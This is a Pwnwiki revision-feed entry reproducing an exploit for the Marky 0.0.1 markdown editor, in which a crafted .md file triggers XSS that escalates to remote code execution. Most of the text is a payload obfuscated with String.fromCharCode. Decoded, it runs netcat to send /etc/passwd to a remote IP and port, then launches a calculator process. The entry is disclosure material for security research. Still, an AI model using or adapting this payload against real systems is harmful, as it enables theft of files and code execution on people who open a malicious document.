https://pwnwiki.com/index.php?action=history&feed=atom&title=Marky_0.0.1_XSS%26RCE%E6%BC%8F%E6%B4%9E 2026-04-10T00:35:37Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Marky_0.0.1_XSS%26RCE%E6%BC%8F%E6%B4%9E&diff=2486&oldid=prev 2021-05-05T12:20:09Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Marky 0.0.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Ven...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Marky 0.0.1 - XSS to RCE<br /> # Exploit Author: TaurusOmar<br /> # Date: 04/05/2021<br /> # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H<br /> # Risk: High (8.8)<br /> # Vendor Homepage: https://github.com/vesparny/marky<br /> # Version: 0.0.1<br /> # Tested on: Linux, MacOs, Windows<br /> <br /> # Software Description:<br /> Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page.<br /> <br /> <br /> <br /> # Vulnerability Description:<br /> The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.<br /> The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to<br /> the remote attacker to get remote execution on the computer.<br /> <br /> <br /> #Proof Video<br /> https://imgur.com/a/qclfrUx<br /> <br /> <br /> <br /> # Payload : exec(Attacker Reverse netcat stolen =&gt; /etc/passwd) &amp;&amp; exec(calc)<br /> <br /> [&lt;audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))&gt;](http://)<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki